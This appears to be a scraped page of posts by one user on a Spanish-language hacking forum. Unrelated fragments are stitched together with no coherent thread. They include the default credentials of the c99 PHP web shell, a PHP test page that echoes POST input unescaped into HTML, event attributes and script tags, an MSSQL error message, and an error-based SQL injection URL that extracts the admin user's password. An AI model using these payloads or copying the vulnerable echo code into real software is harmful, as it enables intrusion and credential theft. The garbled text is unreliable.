o sea que si mi web tiene xss la atacarías con muchos "<br />" ?

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú$login = "c99"; //login
//DON'T FORGOT ABOUT CHANGE PASSWORD!!!
$pass = "c99"; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
a = 0
b = 9999
var c
d = 1
for(c=a;c<=b;c++)
c=d
<script><?php echo $_POST['test']; ?></script>
<table id="clean">
<tr>
<td><strong>HTML injection</strong></td>
<td><?php echo $_POST['test']; ?></td>
</tr>
<tr>
<td><strong>a href and onclick doublequoted</strong></td>
<td><a onclick="<?php echo $_POST['test']; ?>" href="?test=<?php echo $_POST['test']; ?>">click</a></td>
</tr>
<tr>
<td><strong>a href and onclick singlequoted</strong></td>
<td><a onclick='<?php echo $_POST['test']; ?>' href='?test=<?php echo $_POST['test']; ?>'>click</a></td>
</tr>
<tr>
<td><strong>a href and onlclick no quotes</strong></td>
<td><a onclick=<?php echo $_POST['test']; ?> href=?test=<?php echo $_POST['test']; ?>>click</a></td>
</tr>
<tr>
<td><strong>script tags</strong></td>
<td><script><?php echo $_POST['test']; ?></script></td>
</tr>
</table>
CONVERT(int, test)
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el
valor nvarchar 'A35678956' para una columna de tipo de datos int.
/cgi-bin/datos.asp, línea 25
test.asp?id=convert(int, (select password from usuarios where nick = 'admin')) --
Cita de: Alex@ShellRoot en 18 Marzo 2010, 00:23 AM
Se entiende correctamente, pero lo dudo bastante, dentro de MySQL seh se puede hacer. Pero dentro de este tipo de inyeccion se trabaja bajo MSSQL, si te sirve de algo, esta consulta lista todas las tablas de una base de datos.USE Base_de_Datos SELECT * FROM Information_Schema.Tables